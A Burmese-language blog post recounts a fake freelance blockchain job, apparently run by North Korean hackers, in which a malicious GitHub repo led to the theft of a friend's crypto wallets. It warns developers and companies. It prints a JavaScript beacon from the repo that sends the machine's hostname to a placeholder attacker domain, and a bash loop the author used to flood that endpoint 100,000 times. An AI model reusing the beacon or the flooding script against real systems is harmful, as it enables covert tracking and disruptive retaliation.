ကျနော် FB မှာတင်ထားတာကိုဒီမှာပြန်တင်ထားတာပါ။
မြောက်ကိုရီးယားဟက်ကာတွေကဟက်သွားတာ။ မြန်မာက developer တွေလဲသတိထားနိုင်အောင် မြန်မာလိုရေးပီးပြန်လည်ဝေမျှလိုက်ပါတယ်။
ဖြစ်ပုံကဒီလို…
ကျနော့်အသိက blockchain developer သူ့ရုံးကအခြေအနေမကောင်းတော့ဒီကောင်က freelance လေးဘာလေးရရင်လုပ်မယ်ဆိုပီးလုပ်ထားတာ။
အဲ့အချိန်မှာသူ့ကို email ကနေပီးတော့အလုပ်အပ်ချင်လို့ဆိုပီးဆက်သွယ်လာတာ သူ့ရုံးက release လုပ်ထားတဲ့ feature တခုလိုမျိုးဘဲသူတို့ထဲထည့်ပေးရမှာ budget က 80 K to 180 K USD ရှိတယ်ပြောတယ်။
ကျနော့်အသိကလဲစိတ်ဝင်စားတယ်ဆိုပီးပြောတယ်။ အဲ့ဒါနဲ့ WhatsApp နံပါတ်တောင်းပီးဆက်သွယ်တယ် သူ့ကို GitHub repo invite လုပ်လိုက်တယ်။ တချက်ကြည့်ကြည့်ပေါ့။ သူလဲကြည့်ကြည့်တယ် ကုဒ်တွေလဲကြည့်ကြည့်တယ်အမှန်အကန်ဘဲ လို့ထင်ရတယ်။
အဲ့ဒါနဲ့သူက Repo ကို run ကြည့်လိုက်တယ် error တက်နေတယ်။ hacker ကအဲ့ဒါဆို call ခဏခေါ်ကြမယ်သူကြည့်ပေးမယ်ပြောတယ်။
call ခေါ်လိုက်တယ် error ကတက်နေတုန်းဘဲ။ organize တော့သိပ်မဖြစ်ဘူး ဟိုဘဲပြောတာတွေက ဟိုရောက်ဒီရောက်နဲ့
(အဲ့အချိန်မှာ ကျနော့်သူငယ်ချင်း crypto wallet တွေကအကုန်ပါသွားပီ USD ၄သောင်းကျော်အထက်ရှိတဲ့ Ethereum တွေ သူဝယ်ထားတဲ့အချိန်တုန်းကဆို USD ၅ သောင်းကျော်တန်ဖိုးရှိတယ်)
ကျနော့်သူငယ်ချင်းကပါသွားတာမသိသေးဘူး။ သူကဆက်ပီးတော့စကားတွေပြောနေတာ။ hacker ကသိပ်စကားပြန်မပြောဘူး။ နောက် ၂ ရက်လောက်ကြာတော့ပြန်ဆက်သွယ်လာတယ်။ ပီးတော့ နောက်ထက် blockchain developer တယောက်လောက်ထက်ထည့်ရင်ကောင်းမယ်ပြောတယ်။ ဘာလို့လဲဆိုရင် project timeline ကနဲနဲတိုသွားလို့လို့ပြောတယ်။
ဒါကကျနော့်အသိနဲ့ hacker တဖြတ်…
နောက်တပိုင်းကကျနော့်သူငယ်ချင်းရယ် ကျနော်ရယ် ဟက်ကာရယ်…
ကျနော့်သူငယ်ချင်းက ကျနော့်လာခေါ်တယ်။ ကျနော့်ကို Backend လုပ်။ သူက blockchain လုပ်မယ်ပေါ့။ ပိုက်ဆံကလဲမဆိုးဘူးဘာညာပြောတယ်။ အဲ့ဒါနဲ့ဘယ်လောက်လောက်လဲမေးတော့ ဒေါ်လာ ၁သိန်း လောက်ရမယ်ပြောတယ်။ စိတ်ထဲမှာတော့သူပြောတဲ့ scope နဲ့ဆိုပေးတာနဲနဲများနေတယ်ထင်တယ် ဒါပေမယ့် သူနဲ့ပြောပီးသားဆိုတော့လဲ အေးအေးကောင်းပါတယ်ပေါ့။ ကျနော်ထင်လိုက်တာက client ကလုပ်ခိုင်တာတွေတဖြေးဖြေးများလာတက်လို့နေမယ်ဆိုပီးစဥ်းစားမိတာ (အချိန်ကလဲ ၇ လလောက်လုပ်ကမယ်ပြောတာ လူလိုရင်လဲထက်ခေါ်ပေါ့)။
ကျနော်လဲကိုယ့်အသိကလာပြောတာ သူနဲ့ကိုယ်နဲ့ကလဲအလုပ်လုပ်ဖူးတယ်ဆိုတော့ လုပ်မယ်ဆိုပီးပြောလိုက်တယ်။ ပြောပီးပီးချင်း ကျနော့်သူငယ်ချင်းက WhatsApp group ထဲထက်ထည့်တယ်။
hacker ကကျနော့် Github account တောင်းတယ်။ ကျနော်ပေးလိုက်တယ်။
ကျနော့်ကို repo invite လုပ်ပီးတော့ accept လုပ်ခိုင်းတယ်။ကျနော်လုပ်လိုက်တယ်။ (ကျနော်ကကြတော့ ကျနော့်အသိစီကဆိုတော့ ဟိုကောင်သေချာစစ်စေးပီးလောက်ပီဆိုပီထင်သွားတာ… ဘာလို့လဲဆိုရင် သူငယ်ချင်းကလဲ သူသေချာစကားတွေဘာတွေပြောပီးပီဆိုတာမျိုးပြောတာကိုး)
ကျနော်လဲ Github Repo လဲရကောကုဒ်ကို overview ကြည့်ပီးတော့ စမ်း run ကြည့်လိုက်တယ်။ code က express ကုဒ်ထွေထွေထူးထူးအရမ်းမပါဘူး။
အဲ့မှာကျနော်တို့ကို meeting လုပ်အောင်ဆိုပီးပြောတယ်။ ကျနော်စိတ်ထဲမှာတမျိုးဘဲဆိုပီးခံစားရတယ်။ ချက်ချင်းကြီး meeting ခေါ်မယ်ဆိုတော့… ကုဒ် run နေတာကျနော်ရပ်လိုက်တယ်… ပီးတော့ meeting ကိုအိုကေတယ်လို့ပြောလိုက်တယ်… gmeet ကနေခေါ်ရော… တော်တော်လေး professional မကျဘူး။
ကျနော့်ကိုကုဒ် run ခိုင်းနေတယ် အဲ့ဒါနဲ့ကျနော်လဲနေဦးဒါတွေမလုပ်ခင်မင်းကိုမေးစရာရှိတယ်ဆိုပီးပြောတော့ ရတယ်မေးပါပေါ့ အသံကဂျပန်အသံလိုမျိုးဘဲ။ အရင်ဆုံးကျနော်မေးတာမင်း နာမည်ဘယ်လိုခေါ်လဲမေးတယ်။ အမည်ပြောတယ်။
နောက်မင်းမှာ linkedin ရှိလားမေးတယ် linkedin ပေးတယ် linkedin ကြည့်လိုက်တော့နဲနဲ sup ဘဲ။ ဒါပေမယ့်ကျနော်ကအသိကနေလာတာဆိုတော့အရမ်းကြီးနင်းကန်မေးလို့မဖြစ်ဘူးဆိုပီး… မေးနေတာနဲနဲပြန်လျှော့လိုက်တယ်။
ဒါပေမယ့် professional မကျဘူးဆိုတာတော့သိလိုက်တယ်။
ကျနော်နောက်ထက် laptop တလုံးဖွင့်ပီးတော့ repo ကအဲ့စက်ထဲမှာ run လိုက်တယ်။ စိတ်ကဘာဖြစ်တာလဲမသိဘူး။ လက်ရှိကွန်ပျူတာထဲမှာ မ run ချင်တော့ဘူး
နောက်တလုံးမှာ run ပီးတော့ call ကိုလဲအဲ့တလုံးမှာဘဲ run ပီးတော့ပြလိုက်တယ်။
နောက်သူငယ်ချင်းကိုလဲ this guy is weird ဆိုတာချည်း ကျနော်တို့နှယောက် private message ကနေပို့နေတာ။ သူကလဲပိုက်ဆံလိုနေတယ်ထင်တယ်
တချက်ကြည့်ကြည့်ပါဦး တချက်ကြည့်ကြည့်ပါဦးဆိုပီးပြောနေတာ။
အဲ့ဒါနဲ့ကျနော်နောက် laptop တလုံးကနေပြတော့ ဆရာသမားက ဟိုဘက်စက်နဲ့ပြန် run ကြည့်ပါပြောတယ်။ ကျနော်ဘူသွားတာ… အဲ့ဒါနဲ့ဘာလို့လဲ စက်ချင်းကလဲအတူတူဘဲ ဘာလို့အဲ့ဘက်မှာ run စေချင်ရတာလဲမေးပီးတော့ လက်ရှိကွန်ပျူတာက process ကိုလဲရပ်လိုက်တယ်။
အဲ့ကနေသူ run ခိုင်းတာတွေ မ run တော့ဘဲ ငါတို့ဒီတိုင်းဆက်သွားလို့တော့မဖြစ်ဘူး
contract တွေဘာတွေလိုမယ်ပြော… ပီးရင်မင်းတို့လိုချင်တာဘာတွေလဲ… ဘယ်လို feature တွေလိုချင်တာလဲဆိုတာတွေဆက်တိုက်ကျနော်မေးကော။
အဲ့ကြတော့ဆရာသမားက CTO စီကအဲ့ဒါတွေပြန်ညှိရဦးမယ်ပြောတယ်။
အဲ့ဒါနဲ့ကျနော်လဲအေးအဲ့ဒါဆိုအကုန်ညှိပီးမှငါတို့ကိုပြန်ခေါ်လိုက်လို့ပြောတော့ သူကအဲ့ဒါဆိုမနက်ဖြန်ခေါ်လိုက်မယ်ဆိုပီးလုပ်ကော… အဲ့ဒါနဲ့မနက်ဖြန်ဘယ်အချိန်လဲဘာညာမေးတာပေါ့သိပ်မဖြေနိုင်ဘူး။ မနက်ဖြန်စင်ကာပူည ၉ နာရီလုပ်လိုက်ဆိုပီးပြောတော့သူကအဆင်ပြေတယ်ဆိုပီး meeting end လိုက်ကော။
call ပီးသွားတော့ ကျနော့်ဘော်ဒါကိုပြောတာ မင်းကောင်ကမဟုတ်ဘူးထင်တယ်နော်ဆိုပီးသူကလဲတော်တော်လေးပိုက်ဆံလိုနေလားမသိပါဘူး ငါတို့မနက်ဖြန် meeting တော့ဝင်ကြည့်လိုက်မယ်အဲ့ကြမှအခြေအနေမကောင်းရင်ရပ်လိုက်ကြမယ်ဆိုပီးတော့ ပြောတယ်။
ကျနော့်အမျိုးသမီးကလဲကျနော့်ကိုမေးတယ် ဒီနေ့မှ meeting ဝင်တာကျနော်မေးတာကြမ်းလှချည်လားဆိုပီးပြောတယ်။ ကျနော်လဲအဲ့ကောင်က professional တော်တော်မဆန်တာလို့ပြောပီးရှင်းပြလိုက်သေးတယ်။
ရေသွားချိုးဦးမယ်ဆိုပီးရေချိုးခန်းထဲဝင်ပီး ဖုန်းက BBC Burmese YouTube ဖွင့်နားထောင်ရင်းရေချိုးနေတာ… အဲ့အချိန်မှာကျနော့်သူငယ်ချင်းကကျနော့်စီဖုန်းဆက်တယ်။ SK SK ငါတော့အကုန်ပါသွားပီ hack ခံလိုက်ရပီဆိုပီးတော့။ ကျနော်ကရေချိုးရင်းဆိုတော့ အမျိုးသမီးကိုလှမ်းအော်ပီး ကျနော့်ကွန်ပျူတာတွေအကုန် shutdown လုပ်ခိုင်းလိုက်တယ်။
ရေမြန်မြန်ချိုးပီးတော့ ကျနော့်သူငယ်ချင်းပြန်ခေါ်တော့ ဘရိုငါ wallet တွေအကုန်ပါသွားပီ ETH အဲ့အချိန်ကတန်ဖိုး 40K အထက် သူဝယ်တုန်းက 50K
အကုန်ပါသွားပီဆိုပီးပြောတယ်။
ကျနော့် wallet တွေလဲကျနော်ပြန်စစ်တော့မပါသေးဘူး ဒါပေမယ့်စိတ်ချရအောင်လုပ်သင့်တာတွေလုပ် (port တွေစစ် htop နဲ့ဘာတွေ run နေလဲစစ်) ပီးတော့ သူတို့ကုဒ်ကိုလဲ rm -rf လုပ်။
သူတို့ကုဒ် zip တွေတော့ထားထားတာပေါ့ (ကြည့်ကြည့်ချင်ရင်ပို့ပေးလို့ရတယ်လာပြောပါ)။
ဘယ်အချိန်ကပါသွားလဲဆိုတော့လွန်ခဲ့တဲ့ ၂ ရက်ကသူအဲ့ကောင်တွေဖုန်းခေါ်တဲ့နေ့နောက်နေ့ပါသွားတာ။ ဒါပေမယ့်အဲ့ကောင်တွေကိုတော့ susp ဖြစ်တယ်
ဟုတ်မဟုတ်မသိဘူးလုပ်နေတာ။
ကျနော်ကဘရိုအဲ့ကောင်တွေဖြစ်ဖို့သေချာသလောက်ရှိတယ်ပြောတော့သူ့မိန်းမကပါဘေးကနေသူတို့လုပ်တာဆိုရင်ဘာလို့နင့်ကို နောက်ထက်ဆက်သွယ်လဲဆိုပီးမေးတယ်။ ကျနော့်သူငယ်ချင်းက နောက်ထက်လူလိုချင်လို့ပေါ့ဆိုပီးပြောတာ။ သိပ်တော့လက်မခံချင်သေးဘူး အဲ့ကောင်တွေကြောင့်ဆိုတာကို။ သူတို့ကဆုံးရှုံးလိုက်တဲ့သူတွေဆိုတော့ project လိုချင်နေသေးတာထင်တယ်။ ပိုက်ဆံကလဲမက်လောက်စရာကိုး။
အဲ့အချိန်မှာကျနော့်သူငယ်ချင်းက အဲ့ကောင်တွေဟုတ်လောက်တယ် လွန်ခဲ့တဲ့တရက်လောက်တုန်းကလဲ သူ့အမျိုးသမီးရဲ့ credit card တွေ hack ခံလိုက်ရတယ်ဆိုပီးပြောတယ်။ (အဲ့ပိုက်ဆံတွေတော့ bank တွေကဆိုတော့ပြန်ရတယ်ပြောတယ်)
အဲ့လိုနဲ့ညဘက်လဲအတော်နောက်ကျသွားတယ်။ ဖုန်းချပီး ကျနော်ကကျနော့်ကွန်ပျူတာစစ်စရာရှိတာတွေစစ်ပီးတော့အိပ်သွားတာ။ ကျနော့်သူငယ်ချင်းကသူပါသွားတာဆိုတော့မအိပ်ဘဲနဲ့လိုက်စစ်နေတာ။ ကျနော်မနက် ၁၀ နာရီလောက်မှကွန်ပျူတာရှေ့ထိုင်ဖြစ်တာ။ သူငယ်ချင်းကသူ ရဲတိုင်ထားတယ်ဆိုပီးပြောတယ်။ နောက်သူကုဒ်ထဲမှာ sup ဖြစ်တာတခုတွေ့တယ်ဆိုပီးအောက်ကကုဒ်ကိုပြတယ်။
attacker-domain ဆိုတာ hacker ရဲ့ domain ပေါ့။ (FB ကလက်မခံမှာစိုးလို့ဒီမှာအမှန်မထည့်ထားတာ သိချင်တယ်ဆိုရင်လာမေးလို့ရပါတယ်။)
module.exports.verify = () => {
try {
const hostname = os.hostname();
const verifyMessage = `#[5-Run-C604] [${hostname}]\n${__filename}\n`;
fetch('attacker-domain/verify-human/5', {
method: 'POST',
body: new URLSearchParams({
text: verifyMessage
})
});
} catch (err) {
}
};
အဲ့ဒါနဲ့ကျနော် curl ကနေစမ်းခေါ်ကြည့်တာ။ အဲ့ကောင်ကျနော့်ကိုချက်ချင်းဖုန်းခေါ်တာ whatapps ကနေ။ ကြည့်ရတယ်ဒီကောင်ကသူတို့ကို noti ပေးတဲ့ကောင်ထင်တယ်။ မကိုင်လိုက်ဘူး။ ဒါနဲ့စမ်းချင်တာနဲ့ အောက်က bash script ရေးပီး ခေါ်ထားလိုက်တာ
#!/bin/bash
for i in {1..100000}; do
curl -X POST attacker-domain/verify-human/5 \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d "text=#[5-LogIn-C604] Fuck You"
echo "\n"
done
ဖုန်းတွေဆက်ခေါ်နေသေးတယ်။
code scanner တွေ run… google ရှာနဲ့အားလုံးခြုံကြည့်လိုက်တော့
မြောက်ကိုရီးယားကဆိုတာသေချာသလောက်ဘဲ။ ဒါပေမယ့်ကျနော့်ဘော်ဒါကမယုံကြည်နိုင်သေးဘူး (ကိုယ့်ပိုက်ဆံပါသွားတော့ သိပေမယ့်လဲမယုံချင်တာပြောတာပါ)။ ကျနော်ပြောတာက ကျနော်တို့သူ့ကို project fees 25% တောင်းကြည့်လိုက်လို့ရတယ်ဆိုရင်သူတို့ဟုတ်ချင်မှဟုတ်လိမ့်မယ်လို့။ ဒါပေမယ့်အဲ့ကောင်တွေဖြစ်ဖို့သေချာသလောက်ရှိတယ်လို့ကျနော်ပြောလိုက်တာ။ သူကအဲ့လိုမျိုးပို့လိုက်တယ် ၂၅% ပေးပေါ့အဲ့ဒါဆိုဆက်လုပ်မယ်ဘာဆိုပီးတော့။
hacker စီကဘာမှမလာတော့ဘူး။
ဒီကောင်တွေဆိုတာသေချာသလောက်ဖြစ်နေတာဆိုတော့ သူကမစောင့်နိုင်တော့ဘူး… ဒီတိုင်း direct message ကနေ ငါ့ပိုက်ဆံတွေပြန်ပေးပါ့လားဆိုပီးသွားပြောတာ… ဟိုကဘာတွေလာပြောနေတာလဲကောင်လေးဆိုပီးပြောတယ်။
အဲ့လိုပြောပီးနောက်သိပ်မကြာဘူး… ဟိုဘဲကဟုတ်တယ်သူတို့လုပ်တာဆိုပီးပြောတယ်။ မင်းပိုက်ဆံပြန်ပေးမယ်ငါတို့ကို တခြားစက် တွေမှာသွင်းဖို့မင်းကူပေးဆိုပီးပြောတယ်။ ကျနော့်ဘော်ဒါက သူတို့ပြောတဲ့အတိုင်းမလုပ်ဘဲ ရဲကိုဘဲဆက်ပီး update လုပ်လိုက်တယ်။
ဇာတ်လမ်းကတော့အဲ့ဒါပါဘဲ။
မြန်မာမှာအလုပ်အကိုင်တွေရှားနေတော့ မြန်မာကလူတွေဒါမျိုးတွေ scam/hacker တွေရှိတယ်ဆိုတာသိစေချင်လို့ပါ။ နောက်ပိုင်းမြောက်ကိုရီးယားတွေက linkedin မှာပါ premium ဝယ်ပီးတော့ အလုပ်ရှာတဲ့သူတွေကို target ထားလာတာပါ။ Open to Work လုပ်လိုက်ပီဆိုရင်ဒါမျိုးတွေရဲ့ target ဖြစ်ဖို့အရမ်းများပါတယ်။ ဂရုစိုက်ကြပါ။
Company တွေအနေနှင့်ဆိုရင်လဲ အလုပ်ရှာနေတဲ့သူတွေအဖြစ်ပါသူတို့ကလုပ်လာပီးတော့ company တွေထဲထိဝင်နိုင်အောင်လုပ်နေကြပါတယ်။ အဲ့တော့ကိုယ်အင်တာဗျုးမယ့်သူကိုသေချာလေးဂရုစိုက်ဖို့အကြံပေးချင်ပါတယ်။
Developer တွေအနေနှင့်ဆိုရင်လဲ package တွေကိုအထူးဂရုစိုက်ပီးတော့မှ install လုပ်စေချင်ပါတယ်။ stars တွေအများကြီးရှိတယ် PR တွေအများကြီးရှိတယ်ဆိုတာနှင့်မရပါဘူး။ သူတို့မှာအဲ့လိုမျိုးတွေလုပ်ဖို့လုံလောက်တဲ့လူရှိပါတယ်။
ဒီတခုလုံးမှာ
ကျနော့်သူငယ်ချင်းက အလုပ်လုပ်ချင်နေတာဆိုတော့ သေချာမတွေးလိုက်ဘူး။
ကျနော်ကကြတော့ သူငယ်ချင်းစီကလာတာဆိုပီးတော့ ပေါ့ပေါ့တန်တန်တွေးမိလိုက်တာ။ နောက်တခု code repo တွေ invite လုပ်ပီးစမ်းကြည့်ပါဘာညာဆိုရင် zip download လုပ် scan လုပ်သင့်တာတွေလုပ်ပီးမှဆက် process လုပ်သင့်တယ်။ ဖြစ်နိုင်ရင် isolated vm တွေမှာ run ရင်ပိုကောင်းမယ်။
ကျနော်တော့အခုစာရေးနေစဥ်အတွင်းမှာဘဲ ကျနော့်သူငယ်ချင်းပြောတဲ့ “bro, I really need this money” ဆိုတာဘဲကြားယောင်နေမိပါတယ်…
ကျနော့်သူငယ်ချင်းကို hack သွားတာနှင့်ဆင်တဲ့ case Bored BeaverTail & InvisibleFerret Yacht Club – A Lazarus Lure Pt.2
ကုဒ်တွေ URL တွေနဲနဲ sup ဖြစ်တာနဲ့ ဒီ website မှာစစ်နိုင်ပါတယ်